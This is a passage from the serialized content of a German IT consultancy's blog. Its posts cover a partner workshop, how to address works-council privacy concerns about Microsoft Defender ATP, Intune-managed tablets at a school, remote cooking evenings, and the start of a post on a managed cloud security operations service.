Kosten.",[2559,4912,4914,4915,4917,4918,4920,4921,4923],{"style":4913},"font-size: 24px; text-align: center; color: #0061aa; margin-top: 30px; margin-bottom: 10px;","\"Viel geiler geht’s nicht, aber wir arbeiten daran.",[2970,4916],{},"Neun firmenübergreifende Teams arbeiten an Themen wie ganzheitlichen Angeboten",[2970,4919],{},"für unsere Kunden und gemeinsamen Projektbörsen sowie Produktentwicklung.",[2970,4922],{},"Endlich mit Profis!\"",[2559,4925,4927],{"style":4926},"text-align: center; margin-bottom: 30px;","Daniel Henschel, PHAT CONSULTING",[353,4929,4930,4931,4935,4936,4939],{},"Vor zwei Jahren gaben wir unsere ",[374,4932,4934],{"href":4933},"/blog/gk/2018/11/phat-gab-gk-partnerschaft/","strategische Partnerschaft"," bekannt, im letzten Sommer überzeugten wir Microsoft mit unserer gemeinsamen Bewerbung und erhielten für unsere Kooperation den ",[374,4937,3935],{"href":4938},"/blog/microsoft/award/2019/06/gk-microsoft-partner-of-the-year/",". In diesem Jahr riefen wir zusammen die WGG-Workshop Reihe ins Leben, mit dem Ziel uns auszutauschen, gegenseitig inspirieren zu lassen und noch intensiver zusammenzuarbeiten.",[353,4941,4942],{},"Gestern kamen Cloud Architekten, Projektmanager, Service- und Sales-Kollegen aus Nord und Süd hier nach Offenbach am Main, um unterschiedliche Kompetenzen auszuloten und Herausforderungen in Projekten zu diskutieren. Neben den jeweiligen Unternehmens-Pitches rundete eine gemeinsame Partner of the Year Feier den Tag ab.",[353,4944,4945],{},"Heute starteten wir direkt mit den verschiedenen Breakout Sessions, die sich in einen technischen und einen organisatorischen Track teilten. Interaktive Workshops, bei denen wir Projekterfahrungen austauschten, sowie Deep Dives in den Modern Workplace.",[353,4947,4948,4949,456],{},"Der nächste WGG Workshop wird voraussichtlich Mitte des Jahres stattfinden. Zuvor treffen wir uns in kleinerer Runde für einen gemeinsamen ",[374,4950,4952],{"href":697,"rel":4951},[378],"Webcast Friday",[353,4954,4955],{},[356,4956],{"alt":4957,"src":4958},"Impressionen","https://res.cloudinary.com/c4a8/image/upload/blog/pics/wgg-impressionen.jpg",{"title":402,"searchDepth":403,"depth":403,"links":4960},[],"Zwei Tage, über 40 Teilnehmer und 100 Prozent Cloud Content von und mit GAB, PHAT CONSULTING und Glück & Kanja - auf dem ersten 'Wie geht's geiler?'-Workshop in Offenbach am Main kamen alle Teilnehmer voll auf ihre Kosten.",{"categories":4963,"blogtitlepic":4964,"socialimg":4965,"customExcerpt":4966},[410],"head-wgg","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-wgg.jpg","Zwei Tage, über 40 Teilnehmer und 100 Prozent Cloud Content für GAB, PHAT CONSULTING und Glück & Kanja - auf dem ersten 'Wie geht's geiler?'-Workshop in Offenbach am Main kamen alle Teilnehmer voll auf ihre Kosten.","2020-02-14","/posts/2020-02-14-wgg",{"title":4894,"description":4961},"posts/2020-02-14-wgg",[2501,420,2500],"avAZe0nQinBnptz2IvXJAwUIFlbXE0fntbKc1sS2Uds",{"id":4974,"title":4975,"author":4976,"body":4978,"cta":3,"description":5142,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":5143,"moment":5148,"navigation":415,"path":5149,"seo":5150,"stem":5151,"tags":5152,"webcast":406,"__hash__":5155},"content_de/posts/2020-03-02-mdatp.md","Keine Angst vor Microsoft Defender ATP",[164,4977],"Heike Ritter (Microsoft)",{"type":350,"value":4979,"toc":5134},[4980,4988,4991,4994,4997,5000,5008,5011,5018,5022,5025,5034,5038,5070,5077,5081,5084,5101,5107,5111,5114,5118,5121,5125,5128,5131],[353,4981,4982,4983,4987],{},"Die Stärke von ",[374,4984,4563],{"href":4985,"rel":4986},"https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection",[378]," liegt in der intelligenten Analyse der Daten. Mithilfe komplexer Erkennungs- und Schutztechnologien kann Microsoft Defender ATP bekannte und unbekannte Verhaltensweisen (beispielsweise das Schreiben in die Registry oder der Versuch, auf den LSASS-Prozess zuzugreifen) bestimmten Clients zuordnen und eine Warnung ausgeben, sobald verdächtige Aktivitäten beobachtet werden.",[353,4989,4990],{},"Damit die Daten analysiert werden können, muss Microsoft Defender ATP diese Daten in Echtzeit erfassen. MDATP arbeitet hier ähnlich eines Flugzeugschreibers, der wichtige Flugdaten aufzeichnet, um die Untersuchung von Unfällen und Zwischenfällen zu erleichtern.",[353,4992,4993],{},"Diese Art der Datenerhebung gibt aktuell immer wieder Anlass zur Sorge. Betriebsrat und Datenschutzbeauftragte (DSB) wollen genau wissen, was mit Daten geschieht, die auf dem Computer eines Benutzers gefunden werden. Eines der größten Bedenken ist es, dass Technologien dafür eingesetzt werden, die jeweilige Mitarbeiterleistung zu analysieren.",[353,4995,4996],{},"Umso wichtiger ist es, Betriebsrat und Datenschutzbeauftragten detailliert darzulegen, welche Benutzerdaten gesammelt werden, wie die Benutzerdaten analysiert werden und wie die Daten geschützt werden.",[353,4998,4999],{},"In diesem Artikel beschäftigen wir uns mit folgenden Fragen:",[367,5001,5002,5005],{},[370,5003,5004],{},"Welche Rolle spielt Microsoft Defender ATP für den Schutz von Unternehmen und warum ist es wichtig, MDATP einzusetzen",[370,5006,5007],{},"Welche Daten werden überhaupt von MDATP von den Benutzern erfasst",[353,5009,5010],{},"Ziel unseres Artikels ist es, einen Weg aufzuzeigen, sowohl auf die Bedenken von Betriebsrat und DSB einzugehen als auch Unternehmen den Mehrwert zu veranschaulichen, den sie durch den Einsatz von Microsoft Defender ATP erfahren.",[353,5012,5013,5014,5017],{},"Zuallererst: ",[433,5015,5016],{},"Seien Sie so ehrlich und transparent wie möglich",". Dies sollte eine allgemeine Regel für eine vertrauensvolle Zusammenarbeit sein, ist aber in dieser Situation besonders wichtig. Von der Nicht-IT-Seite aus betrachtet, scheinen all diese Lösungen schwarze Löcher zu sein - völlig unbekannt und sehr verdächtig. Zeigen Sie dem Betriebsrat verständlich auf, dass eine moderne Sicherheitsplattform wie Microsoft Defender ATP weder die Produktivität eines Benutzers ermittelt, noch seine Arbeitszeiten trackt oder eine Analyse darüber fährt, wie lange ein Mitarbeiter für seine eigentliche Arbeit benötigt.",[629,5019,5021],{"id":5020},"microsoft-defender-atp-für-den-schutz-von-unternehmen","Microsoft Defender ATP für den Schutz von Unternehmen",[353,5023,5024],{},"Microsoft Defender ATP bringt zwei wesentliche Neuerungen für die Verbesserung des Unternehmensschutzes.",[5026,5027,5028,5031],"ol",{},[370,5029,5030],{},"In der Vergangenheit war Anti-Malware-Software hauptsächlich in der Lage, bekannte Bedrohungen abzuwehren. Wenn ein Stück Malware beispielsweise gegronauso aussah wie etwas, das bereits als bösartig identifiziert und vorher erkannt wurde, war klar: Es handelt sich um Malware. Die Angreifer haben sich im Laufe der Zeit aber weiterentwickelt, und neue Malware erscheint von einem Computer zum anderen völlig unterschiedlich. Für Unternehmen bedeutet das, dass sie neue Lösungen mit neuen Erkennungstechniken benötigen - die sogenannte Verhaltensanalyse. Diese Techniken müssen nicht wissen, wie Malware aussieht, sondern sie analysieren vielmehr das Verhalten. Genau so arbeitet Microsoft Defender ATP, es untersucht das Auftreten und warnt vor verdächtigen Aktivitäten.",[370,5032,5033],{},"Einer der größten Einstiegspunkte für Malware in unsere Computer sind immer noch Schwachstellen auf nicht gepatchten Systemen. Jeder hört immer wieder: \"Patchen Sie Ihre Systeme und Sie sind sicher!\". Das Problem dabei ist, dass die meisten Unternehmen nicht wissen, welche Software auf den Clients installiert ist und welche Schwachstellen diese Software hat. Microsoft Defender ATP berichtet darüber und sagt Ihnen genau, wie anfällig die Rechner in Ihrem Unternehmen sind und was Sie wo patchen sollten.",[629,5035,5037],{"id":5036},"welche-daten-werden-gesammelt","Welche Daten werden gesammelt",[367,5039,5040,5043,5046,5049,5052,5055,5058,5061,5064,5067],{},[370,5041,5042],{},"Registry Events",[370,5044,5045],{},"File Creation Events",[370,5047,5048],{},"Network Events",[370,5050,5051],{},"Logon Events",[370,5053,5054],{},"Installed Application Information",[370,5056,5057],{},"Machine Information",[370,5059,5060],{},"Kernel Events",[370,5062,5063],{},"Memory Events",[370,5065,5066],{},"Hardware Changes",[370,5068,5069],{},"System API Calls",[353,5071,5072,5073,456],{},"Weitere Informationen zur Compliance finden Sie ",[374,5074,1491],{"href":5075,"rel":5076},"https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/data-storage-privacy",[378],[629,5078,5080],{"id":5079},"maßnahmen-die-ergriffen-werden-können","Maßnahmen, die ergriffen werden können",[353,5082,5083],{},"Um tiefer in ein Sicherheitsproblem einzutauchen oder darauf zu reagieren, können ausgewiesene Security-Analysten / Mitglieder von Security Operations / Administratoren (abhängig von Ihrer Berechtigung) folgende Aktionen auf Computern durchführen:",[367,5085,5086,5089,5092,5095,5098],{},[370,5087,5088],{},"Rechner isolieren (Benutzer wird benachrichtigt - keine Verbindung zum Internet und zum lokalen Netzwerk möglich)",[370,5090,5091],{},"Ausführung von Apps einschränken (nur zertifizierte Apps können danach ausgeführt werden)",[370,5093,5094],{},"Auslösen einer Antiviren-Prüfung",[370,5096,5097],{},"Zusammenstellung eines Recherchepakets (Sammlung weiterer Daten vom Client, wie z.B. eine Liste aller laufenden Prozesse, Security Event Log usw.)",[370,5099,5100],{},"Initiieren einer Live-Response Session (Remote Command Shell)",[353,5102,5103,5106],{},[433,5104,5105],{},"Wichtig:"," Jede Maßnahme wird protokolliert und im Action Center überprüft.",[629,5108,5110],{"id":5109},"aufbewahrung-und-speicherung-von-daten","Aufbewahrung und Speicherung von Daten",[353,5112,5113],{},"Microsoft Defender ATP-Daten werden maximal 180 Tage lang gespeichert und können in den Vereinigten Staaten, in Großbritannien oder in Europa gespeichert werden. Der Kunde definiert die Dauer der Datenspeicherung und den Datenort während der Ersteinrichtung. Stimmen Sie sich mit Ihrem CISO ab - in der Regel möchte er die Daten so lange wie möglich aufbewahren.",[629,5115,5117],{"id":5116},"datenzugang","Datenzugang",[353,5119,5120],{},"Stellen Sie sicher, dass nur eine kleine qualifizierte Gruppe des Security IT-Teams Zugang zu diesen Daten hat. Diese Gruppe kann auch gebeten werden, eine Erklärung zu unterzeichnen, dass sie die Daten nur zur Bedrohungsjagd und nicht zur \"Überwachung der Mitarbeiterleistung\" verwenden.",[629,5122,5124],{"id":5123},"transparenz-und-gute-zusammenarbeit-aufrechterhalten","Transparenz und gute Zusammenarbeit aufrechterhalten",[353,5126,5127],{},"Eine gute Möglichkeit, die Transparenz zu gewährleisten, besteht darin, die Kommunikation und Zusammenarbeit mit dem Betriebsrat und den Datenschutzbeauftragten unmittelbar nach der Einführung von Microsoft Defender ATP weiterzuführen. Berichten Sie kontinuierlich über Sicherheitsvorfälle und die Reaktion auf diese Vorfälle. Lassen Sie Ihr Gegenüber nicht wieder in das schwarze Loch fallen, das man anfangs befürchtet hatte. Beziehen Sie alle Beteiligten aktiv ein, um Ihr Vertrauen zu erhalten.",[353,5129,5130],{},"Es gibt auch andere Abteilungen in ihrem Unternehmen, die die gleichen Interessen haben wie Sie - je nachdem, welche Rolle Sie spielen - arbeiten Sie mit allen zusammen! Schließen Sie IT-Sicherheit und Informationssicherheit (oder die CISO) mit ein und bitten Sie sie, sich an Meetings zu diesen Thema zu beteiligen, um eine lebhafte Diskussion zu führen, in der alle Interessen des Unternehmens angesprochen werden.",[353,5132,5133],{},"Wir freuen uns über Feedback zu diesem Artikel. Lassen Sie uns wissen, wir Ihre Erfahrungen mit Ihrem Datenschutzbeauftragten oder dem Betriebsrat sind, und teilen Sie uns Ihre Empfehlung mit, um die regulatorischen Bedenken zu überwinden.",{"title":402,"searchDepth":403,"depth":403,"links":5135},[5136,5137,5138,5139,5140,5141],{"id":5020,"depth":704,"text":5021},{"id":5036,"depth":704,"text":5037},{"id":5079,"depth":704,"text":5080},{"id":5109,"depth":704,"text":5110},{"id":5116,"depth":704,"text":5117},{"id":5123,"depth":704,"text":5124},"Die Stärke von Microsoft Defender Advanced Threat Protection (ATP) liegt in der intelligenten Analyse der Daten. Mithilfe komplexer Erkennungs- und Schutztechnologien kann Microsoft Defender ATP bekannte und unbekannte Verhaltensweisen (beispielsweise das Schreiben in die Registry oder der Versuch, auf den LSASS-Prozess zuzugreifen) bestimmten Clients zuordnen und eine Warnung ausgeben, sobald verdächtige Aktivitäten beobachtet werden.",{"categories":5144,"blogtitlepic":5145,"socialimg":5146,"customExcerpt":5147},[1117],"head-mdatp","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-mdatp.jpg","Microsoft Defender ATP schützt Microsoft 365 Benutzer auch vor modernen Bedrohungen. Um dies zu tun, müssen die Daten auf den Endgeräten in Echtzeit erfasst werden. Dies ruft Betriebsrat und Datenschutzbeauftragten auf den Plan. Seien Sie so ehrlich und transparent wie möglich.","2020-03-02","/posts/2020-03-02-mdatp",{"title":4975,"description":5142},"posts/2020-03-02-mdatp",[1117,1127,5153,5154],"ATP","Microsoft 365","uWhwS8Q000fD1UfLjxgNMEirnZliAzMSFdH8iMuK5tE",{"id":5157,"title":5158,"author":60,"body":5159,"cta":3,"description":5165,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":5275,"moment":5280,"navigation":415,"path":5281,"seo":5282,"stem":5283,"tags":5284,"webcast":406,"__hash__":5285},"content_de/posts/2020-03-18-modern-workplace-at-school.md","Future Workplace at School",{"type":350,"value":5160,"toc":5273},[5161,5166,5181,5203,5212,5219,5255,5258,5265],[353,5162,5163],{},[433,5164,5165],{},"Unser Future Workplace Client wird mittlerweile von rund 200.000 Anwendern für die tägliche Arbeit genutzt, und unsere Kunden setzen dabei auf Cloud-Management und moderne Arbeitsumgebungen. Wie eignet sich das Konzept eigentlich für Schulen? Sehr gut sogar – wie die Realschule Neuffen mit ihren Tablet-Klassen zeigt. Lesen Sie, wie die Microsoft Cloud das Lernen digital revolutioniert und das Geräte-Management skalierbar und zugleich flexibel macht.",[353,5167,5168,5169,5172,5173,5176,5177,456],{},"Unsere ",[433,5170,5171],{},"100% Cloud-Strategie"," stellt die Weichen für die Zukunft und nimmt Abschied von wartungsintensiven lokalen oder hybriden IT-Umgebungen. Genau vor diesen Strategie-Wechsel stellen wir unsere Kunden und unterstützen sie bei dem Wechsel in diese neue Welt. Auch die ",[433,5174,5175],{},"Realschule Neuffen"," stand bereits im Schuljahr 2016/2017 vor der Entscheidung, wie die Verwaltungsumgebung für die neuen Tablet-Klassen aussehen sollte: Klassisch on-premises oder cloudbasiert. Die Wahl fiel dabei auf Intune - Teil des ",[374,5178,4471],{"href":5179,"rel":5180},"https://www.microsoft.com/de-de/security/business/endpoint-management/microsoft-intune",[378],[353,5182,5183,5186,5187,5190,5191,5194,5195,5198,5199,5202],{},[433,5184,5185],{},"Vorab ein paar Details zum Projekt:"," Die Realschule Neuffen stattet in einem mehrjährigen Pilotversuch komplette Klassen mit Convertible-Tablets aus. Gestartet im Schuljahr 2016/2017, folgten 2018/2019 eine zweite sowie in diesem Schuljahr (2019/2020) eine dritte Tablet-Klasse. Die Schüler/innen einer achten Klasse erhalten jeweils ",[433,5188,5189],{},"ein eigenes Tablet",", das sie bis zu ihrem Abschluss sowohl ",[433,5192,5193],{},"in der Schule als auch zu Hause"," verwenden dürfen – ähnlich wie die mobilen Endgeräte von Mitarbeitern/innen in einem Unternehmen. Die Schule entschied sich dabei bewusst gegen eine „Koffer-Lösung“, bei der Tablets lediglich sporadisch in bestimmten Unterrichtseinheiten verwendet werden. Nur so lernen die Schüler/innen ",[433,5196,5197],{},"nachhaltig den Umgang mit neuen Medien"," und können diese im Anschluss sinnvoll einsetzen. Die alltägliche Verwendung bereitet sie zudem bestens auf das spätere Berufsleben vor. Dank digitalem Stift kommt die Handschrift zudem nicht zu kurz und die Schüler/innen führen nach wie vor ihre Hefte – nur eben digital. Wer sein Tablet mal zu Hause vergessen oder nicht ausreichend geladen hat, kann trotzdem ganz normal mit Stift und Papier teilnehmen: Das Tablet dient nämlich als Ergänzung zum normalen Unterricht. ",[433,5200,5201],{},"Eine optimale Mischung aus digital und analog macht's"," – eine der Grundlagen des Tablet-Konzepts an der Realschule Neuffen. Die mit Windows 10 betriebenen Geräte sind dabei mit diversen Apps und den aktuellen Office-Anwendungen ausgestattet. Zur Kommunikation bzw. dem Austausch von Dateien werden E-Mail, Kalender, Teams, OneDrive und Co. verwendet. Diverse webbasierte Lernangebote und Möglichkeiten der Zusammenarbeit (z.B. Whiteboard) ergänzen den Unterricht sinnvoll. Die erste Tablet-Klasse hat ihren Schulabschluss mittlerweile bereits erfolgreich absolviert.",[353,5204,5205,5209],{},[356,5206],{"alt":5207,"src":5208},"Dank digitalem Stift kommt die Handschrift nicht zu kurz ","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-handschrift.jpg",[748,5210,5211],{},"Dank digitalem Stift kommt die Handschrift nicht zu kurz",[353,5213,5214,5215,5218],{},"Wie eingangs erwähnt, entschied sich die Realschule Neuffen ",[433,5216,5217],{},"für Intune bzw. für das Future Workplace Konzept"," zur Verwaltung der Tablets. Aus gutem Grund: Während Firmen in vergleichbarer Größe eigene IT-Abteilungen oder stark gebuchte IT-Dienstleister beschäftigen, sieht die Situation an Schulen meist anders aus. Oft liegt die IT in Händen von Lehrern/innen, die Schulnetz und Co. neben dem normalen Unterricht betreuen. Es fehlt schlichtweg an Ressourcen, um hochkomplexe IT-Systeme aufrecht und aktuell zu halten – genau hier kommt die Cloud ins Spiel. Die Verwaltung von Servern, das Einspielen von Patches und Hardwaretausch sind Schnee von gestern. Zwar müssen auch Systeme wie Intune konzipiert und verwaltet werden, doch kann man sich dabei auf das Wesentliche konzentrieren und ist voll skalierbar. Die aufwendige Planung und Anschaffung von Hardware fallen weg.",[353,5220,5221,5224,5225,5230,5231,5235,5236,5241,5242,5245,5246,5249,5250,5254],{},[433,5222,5223],{},"Die Geräte-Verwaltung im Detail:"," Die Tablets werden gemeinsam mit den Schülern/innen und Lehrern/innen in Betrieb genommen. Dank ",[374,5226,5229],{"href":5227,"rel":5228},"https://docs.microsoft.com/en-us/windows/deployment/windows-autopilot/windows-autopilot",[378],"AutoPilot"," direkt im Branding der Schule. Nach einer kurzen Anmeldung und dem Einrichten von ",[374,5232,4534],{"href":5233,"rel":5234},"https://www.microsoft.com/de-de/security/business/identity/mfa",[378],", beziehen die Geräte die gewünschte Konfiguration und Software bzw. Apps. Alles Weitere wird mit diversen Intune-Profilen sinnvoll für den Unterricht konfiguriert. Dank ",[374,5237,5240],{"href":5238,"rel":5239},"https://products.office.com/de-de/business/office",[378],"Office 365"," im Hintergrund erhalten die Anwender direkt Zugriff auf diverse Dienste wie ",[433,5243,5244],{},"Exchange Online, OneDrive for Business, die Office-Applikationen und Teams",". Für einen reibungslosen Betrieb werkeln unter der Haube zudem ",[433,5247,5248],{},"Azure AD, Windows Update for Business, Windows Hello, Delivery Optimization, Windows Defender und Co",". In kürzester Zeit sind die Geräte somit betriebsbereit für den Unterricht. Von nun an können die Tablets zentral aktualisiert und gewartet werden. Weitere komplexe Software-Pakete werden dank ",[374,5251,5253],{"href":1843,"rel":5252},[378],"Glück und Kanja's RealmJoin"," installiert. Mittels unserer integrierten LAPS- und Fernwartungs-Lösung kann zudem einfach Support geleistet werden.",[353,5256,5257],{},"Dass dieses Konzept noch viel mehr Potential haben kann, hat die Schule bereits erkannt. So sollen nun auch das normale Schulnetz mit den Pool-Räumen und alle weiteren Clients auf die neue Verwaltung onboarded werden. Dank der nahezu unendlichen Skalierbarkeit von Microsoft Endpoint Management ist dies kein Problem.",[353,5259,5260,5261,5264],{},"Im Zuge der Schulschließung, um die Verbreitung von COVID-19 einzudämmen, erhalten die Schülern/innen der Tablet-Klassen in bestimmten Fächern ",[433,5262,5263],{},"Fernunterricht mit Microsoft Teams"," anhand von Videokonferenzen, gemeinsamem Arbeiten an Dokumenten und dem Bereitstellen von Aufgaben.",[353,5266,5267,5271],{},[356,5268],{"alt":5269,"src":5270},"Unterrichtseinheit im Fach Mathematik","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-teams-unterricht.jpg",[748,5272,5269],{},{"title":402,"searchDepth":403,"depth":403,"links":5274},[],{"categories":5276,"blogtitlepic":5277,"socialimg":5278,"customExcerpt":5279},[534],"head-future-workplace-at-school","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-future-workplace-at-school.jpg","Unser Future Workplace Client wird mittlerweile von rund 200.000 Anwendern für die tägliche Arbeit genutzt, und unsere Kunden setzen dabei auf Cloud-Management und moderne Arbeitsumgebungen. Wie eignet sich das Konzept eigentlich für Schulen? Sehr gut sogar – wie die Realschule Neuffen mit ihren Tablet-Klassen zeigt. Lesen Sie, wie die Microsoft Cloud das Lernen digital revolutioniert und das Geräte-Management skalierbar und zugleich flexibel macht. ","2020-03-18","/posts/2020-03-18-modern-workplace-at-school",{"title":5158,"description":5165},"posts/2020-03-18-modern-workplace-at-school",[534,2126,494,964,494,2126,1408],"_m1ixFqB9Ulj5lQzV1vyWBDyUmwK7iB9SsvOpAiVC3E",{"id":5287,"title":5288,"author":191,"body":5289,"cta":3,"description":5295,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":5335,"moment":5340,"navigation":415,"path":5341,"seo":5342,"stem":5343,"tags":5344,"webcast":406,"__hash__":5347},"content_de/posts/2020-04-23-kochen-mit-zeba.md","Lasst uns kochen!",{"type":350,"value":5290,"toc":5333},[5291,5296,5299,5302,5305,5311,5314],[353,5292,5293],{},[433,5294,5295],{},"In der Freizeit kochen gemeinsam mit der Familie oder mit Freunden? Das macht Spaß und fördert den Zusammenhalt. Warum also nicht auch mit seinen Kollegen kochen? Seit einigen Wochen arbeiten wir bei Glück & Kanja primär von zu Hause. Küchengespräche oder gemeinsame Mittagessen sind zur Zeit nicht möglich. Daher hat unsere Kollegin Zeba Hoffmann den afghanischen Kochabend über Microsoft Teams ins Leben gerufen.",[353,5297,5298],{},"Kochen verbindet. Und macht zudem auch noch Spaß. In Zeiten von Corona ist es umso wichtiger, ein Stück Normalität zurück in den Alltag zu bringen. Das dachte sich auch Zeba, selbst in Afghanistan geboren, seit nunmehr 40 Jahren in Deutschland und seit gut einem Jahr bei Glück & Kanja. Ursprünglich wollte Zeba für das ganze Team im Büro kochen. Derzeitig leider nicht möglich. Jetzt bringt sie uns über Microsoft Teams verschiedene Köstlichkeiten aus Afghanistan in unsere Küchen.",[353,5300,5301],{},"Montags um 18:15 Uhr immer das gleiche Ritual: Viele der Glück & Kanja Kollegen wählen sich in das Teams Meeting \"Afghanisch Kochen mit Zeba\" ein. Früh genug, so dass auch die Kleinsten noch teilnehmen können. Bis zu 20 Teilnehmer sind zugeschaltet, wenn Zeba uns die verschiedenen Schritte erklärt. Es gibt einfache Gerichte. Das aktuelle Rezept wird immer Donnerstags in den Gruppe geschickt, so dass genügend Zeit ist, einkaufen zu gehen. Vegan, vegetarisch oder mit Fleisch, alle werden bei der Auswahl berücksichtigt.",[353,5303,5304],{},"Es wird gekocht, lebhaft durcheinander gesprochen, so dass auch der eine oder andere gemuted werden muss, die Stimmung ist entspannt und ausgelassen. Im Homeoffice zu arbeiten, bedeutet nicht, dass der persönliche Austausch nicht noch genauso stattfinden kann wie zuvor – nur eben per Videocall.",[353,5306,5307],{},[356,5308],{"alt":5309,"src":5310},"Zusammenstellung verschiedener Teller","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-afghanisch-kochen.jpg",[353,5312,5313],{},"Hungrig geworden? Sie sind herzlich eingeladen, die Gerichte nachzukochen.",[353,5315,5316,5326],{},[374,5317,5322],{"href":5318,"target":5319,"rel":5320},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/rezept-afghanisches-dal.jpg","_blank",[5321],"noopener",[356,5323],{"src":5318,"alt":5324,"style":5325},"Afghanisches Dal","width:500px;",[374,5327,5330],{"href":5328,"target":5319,"rel":5329},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/rezept-sabzi-chalau.jpg",[5321],[356,5331],{"src":5328,"alt":5332,"style":5325},"Sabzi Chalau",{"title":402,"searchDepth":403,"depth":403,"links":5334},[],{"categories":5336,"blogtitlepic":5337,"socialimg":5338,"customExcerpt":5339},[410],"head-kochen-mit-zeba","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-kochen-mit-zeba.jpg","In der Freizeit kochen gemeinsam mit der Familie oder mit Freunden? Das macht Spaß und fördert den Zusammenhalt. Warum also nicht auch mit seinen Kollegen kochen? Seit einigen Wochen arbeiten wir bei Glück & Kanja primär von zu Hause. Küchengespräche oder gemeinsame Mittagessen mit den Kollegen sind zur Zeit nicht möglich. Daher hat unsere Kollegen Zeba den afghanischen Kochabend über Microsoft Teams ins Leben gerufen.","2020-04-23","/posts/2020-04-23-kochen-mit-zeba",{"title":5288,"description":5295},"posts/2020-04-23-kochen-mit-zeba",[474,5345,5346],"Social","Homeoffice","2dEFvvYyGa32WsOVczMEhOaJud3PPnGKYV_qBa2vEag",{"id":5349,"title":5350,"author":164,"body":5351,"cta":3,"description":5357,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":5465,"moment":5469,"navigation":415,"path":5470,"seo":5471,"stem":5472,"tags":5473,"webcast":406,"__hash__":5474},"content_de/posts/2020-05-18-ein-jahr-csoc.md","Ein Jahr Cloud Security Operations Center",{"type":350,"value":5352,"toc":5459},[5353,5358,5361,5372,5375,5382,5385,5389,5396,5400,5407,5411,5418,5424,5431,5438,5445,5452,5456],[353,5354,5355],{},[433,5356,5357],{},"Der Modern Workplace Client erfordert moderne Sicherheitslösungen. Microsoft bietet hierfür erstklassige Tools, die alle notwendigen Informationen bereitstellen, um schnell auf Bedrohungen reagieren zu können. Vielen Unternehmen fehlt jedoch in der Regel die Zeit, diese Tools eingehend zu studieren, geschweige denn die personelle Ausstattung, um sie ständig zu überwachen. Aus diesem Grund haben wir vor anderthalb Jahren unseren Managed Service 'Cloud Security Operations Center (CSOC)' gestartet. Ein Fazit.",[353,5359,5360],{},"Der CIO eines großen Unternehmens sagte in meinem Beisein, er habe sich zu Weihnachten ein Fitnessbike gekauft und in den Keller gestellt. Das Problem sei nur, dass er nie in den Keller gehe.",[353,5362,5363,5364,5367,5368,5371],{},"In unseren ",[433,5365,5366],{},"100% Cloud Projekten"," können wir unsere Kunden davon überzeugen, dass ein Modern Workplace Client ",[433,5369,5370],{},"moderne Sicherheitslösungen"," benötigt. Microsoft fasst diese Cloud Security Tools in der 'E5 Security' Lizenz zusammen. Der Einsatz dieser Tools ist für die meisten Kunden unumstritten, damit der moderne Arbeitsplatz, die Cloud Services, die Daten und die Identitäten gleichermaßen und von überall gut geschützt sind.",[353,5373,5374],{},"Allerdings folgt nach einer anfänglichen Begeisterung darüber, was mit diesen Security Tools alles entdeckt werden kann, schnell die Ernüchterung, da vielen Mitarbeitern in Unternehmen in der Regel die Zeit fehlt, sich eingehend mit diesen Werkzeugen zu beschäftigen, geschweige denn die Manpower, um sie ständig zu überwachen. Das ist nachvollziehbar, denn praktisch alle IT-Abteilungen, die ich kenne, sind notorisch überbelastet. Und doch: das Fitnessbike im Keller erfüllt nur dann seinen Zweck, wenn es auch genutzt wird.",[353,5376,5377,5378,5381],{},"Aus dieser Motivation heraus haben wir vor gut eineinhalb Jahren begonnen, die Architektur für unseren ",[433,5379,5380],{},"Managed Service 'Cloud Security Operations Center (CSOC)'"," zu entwerfen. Denn wir haben erkannt, dass im Laufe der Zeit immer mehr Kunden auf moderne Cloud-Sicherheit setzen, aber Unterstützung benötigen.",[353,5383,5384],{},"Dabei bauen wir unter anderem auf folgende Maximen:",[629,5386,5388],{"id":5387},"_1-microsoft-nativ","1. Microsoft Nativ",[353,5390,5391,5392,5395],{},"Wer sich mit der Cloud beschäftigt hat, weiß, Veränderung ist ihr zweiter Vorname. Das ist gerade im Bereich Security wichtig und gut, um ständig neuen Bedrohungen zu begegnen, kann aber auch bedeuten, dass Konnektoren und kundenspezifische Software ständig angepasst werden müssen. Hier setzen wir auf die ",[433,5393,5394],{},"nativen Microsoft-Lösungen"," und sind in ständigem, engem Kontakt mit den jeweiligen Produktgruppen in Israel und Redmond. Wir geben kontinuierlich Feedback und haben so direkten Einfluss auf die Produktentwicklung – was wiederum unseren Kunden zugutekommt.",[629,5397,5399],{"id":5398},"_2-niemand-ist-eine-insel","2. Niemand ist eine Insel",[353,5401,5402,5403,5406],{},"Unsere Kunden profitieren von den Erkenntnissen, die wir in anderen Kundenumgebungen sammeln. Wenn wir beispielsweise eine neue Angriffsmethode entdecken, entwickeln wir hierfür spezielle ",[433,5404,5405],{},"Hunting Queries",", die wir dann in allen Umgebungen einsetzen.",[629,5408,5410],{"id":5409},"_3-immer-mehrwert-erzeugen","3. Immer Mehrwert erzeugen",[353,5412,5413,5414,5417],{},"Alles, was wir unseren Kunden berichten, muss für sie einen Mehrwert schaffen. Der Kunde hat nicht viel von seitenlangen Security-Reports, für die er keine Zeit zum Lesen hat. Stattdessen konzentrieren wir uns auf ",[433,5415,5416],{},"einseitige Reports",", die für das Management geeignet sind und sprechen sie im Detail durch:",[353,5419,5420],{},[356,5421],{"alt":5422,"src":5423},"CSOC Report","https://res.cloudinary.com/c4a8/image/upload/illus/img-csoc-report.jpg",[353,5425,5426,5427,5430],{},"Dieser Ansatz hat sich zu einer ",[433,5428,5429],{},"intensiven Zusammenarbeit"," zwischen dem Glück & Kanja CSOC und den SecOps Abteilungen unserer Kunden entwickelt. Jeden Monat diskutieren wir Vorfälle und mögliche Verbesserungen. Und darüberhinaus unterstützen wir bei der Umsetzung dieser Verbesserungsmöglichkeiten. Das ist entscheidend!",[353,5432,5433,5434,5437],{},"Mittlerweile wenden wir diese Maximen täglich bei mehreren Kunden erfolgreich an. Wir 